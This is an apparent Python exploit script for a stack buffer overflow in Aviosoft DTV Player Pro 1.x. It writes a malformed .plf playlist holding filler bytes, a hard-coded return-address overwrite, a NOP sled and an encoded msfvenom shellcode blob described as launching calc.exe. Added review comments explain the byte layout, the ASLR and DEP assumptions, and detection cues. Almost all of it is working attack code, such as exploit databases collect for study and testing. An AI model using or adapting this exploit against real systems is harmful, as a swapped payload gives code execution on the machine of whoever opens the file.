adtv-exploit.py
#!/usr/bin/env python3
# Stack bof exploit for Aviosoft DTV Player Pro 1.x
# Tested working Win 7 SP1 x64 fully patched
# A hacky hack by BleepSec
# https://www.exploit-db.com/exploits/22932
# https://www.exploit-db.com/apps/55740fe6c4e56674125a1968a139ed36-AviosoftDTVPlayerPro.exe
# badchars = b"\x00\x0a\x1a"
# Shellcode = msfvenom -p windows/exec -a x86 --platform windows -b '\x00\x0a\x1a' -f python -e x86/shikata_ga_nai CMD=calc.exe EXITFUNC=thread
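# Assemble a malformed .plf playlist in memory and write it to plf_file.
#
# Byte layout of the generated file (offsets from the start of the file):
#     0  b"http://" + 253 x b"A"   260 bytes of filler
#   260  4-byte constant           value placed over the saved return address
#   264  56 x 0x90 (16 + 40)       NOP padding
#   320  encoded payload           see the msfvenom line in the file header
#
# For detection and triage: the output is one unbroken "http://" entry far
# longer than a real URL, with no line break, followed by runs of 0x90 and
# non-printable bytes.
#
# NOTE(review): the path is hard-coded; the "sf_" prefix looks like a VM
# shared-folder mount. open() raises if the directory does not exist.
plf_file = "/media/sf_VM_Shared/AviosoftDTV/exploit.plf"
buf = b""
buf += b"http://"
buf += b"A"*253 # Junk data starting with http://
# Little-endian 0x640614E3. A fixed constant only lines up where the code at
# that address is mapped at the same base on every run, i.e. is not relocated
# by ASLR. Which module it belongs to is not stated on this page.
buf += b"\xe3\x14\x06\x64" # EIP overwrite
# NOTE(review): control is expected to continue into the bytes below, which
# sit on the stack; that presupposes DEP is not enforced for the process.
buf += b"\x90"*16 # NOP to ESP
buf += b"\x90"*40 # NOP sled for shellcode
# NOTE(review): encoder output. The header describes it as windows/exec with
# CMD=calc.exe, but that cannot be confirmed by reading these bytes; treat the
# blob as unverified content.
buf += b"\xd9\xc9\xd9\x74\x24\xf4\x5d\x33\xc9\xbb\x90\x73\x6e" # Shellcode
buf += b"\xf1\xb1\x31\x31\x5d\x18\x83\xc5\x04\x03\x5d\x84\x91"
buf += b"\x9b\x0d\x4c\xd7\x64\xee\x8c\xb8\xed\x0b\xbd\xf8\x8a"
buf += b"\x58\xed\xc8\xd9\x0d\x01\xa2\x8c\xa5\x92\xc6\x18\xc9"
buf += b"\x13\x6c\x7f\xe4\xa4\xdd\x43\x67\x26\x1c\x90\x47\x17"
buf += b"\xef\xe5\x86\x50\x12\x07\xda\x09\x58\xba\xcb\x3e\x14"
buf += b"\x07\x67\x0c\xb8\x0f\x94\xc4\xbb\x3e\x0b\x5f\xe2\xe0"
buf += b"\xad\x8c\x9e\xa8\xb5\xd1\x9b\x63\x4d\x21\x57\x72\x87"
buf += b"\x78\x98\xd9\xe6\xb5\x6b\x23\x2e\x71\x94\x56\x46\x82"
buf += b"\x29\x61\x9d\xf9\xf5\xe4\x06\x59\x7d\x5e\xe3\x58\x52"
buf += b"\x39\x60\x56\x1f\x4d\x2e\x7a\x9e\x82\x44\x86\x2b\x25"
buf += b"\x8b\x0f\x6f\x02\x0f\x54\x2b\x2b\x16\x30\x9a\x54\x48"
buf += b"\x9b\x43\xf1\x02\x31\x97\x88\x48\x5f\x66\x1e\xf7\x2d"
buf += b"\x68\x20\xf8\x01\x01\x11\x73\xce\x56\xae\x56\xab\xb9"
buf += b"\x4c\x73\xc1\x51\xc9\x16\x68\x3c\xea\xcc\xae\x39\x69"
buf += b"\xe5\x4e\xbe\x71\x8c\x4b\xfa\x35\x7c\x21\x93\xd3\x82"
buf += b"\x96\x94\xf1\xe0\x79\x07\x99\xc8\x1c\xaf\x38\x15"
# Binary mode keeps the bytes exactly as built; the context manager closes
# the handle even if write() raises.
with open(plf_file, "wb") as f:
    f.write(buf)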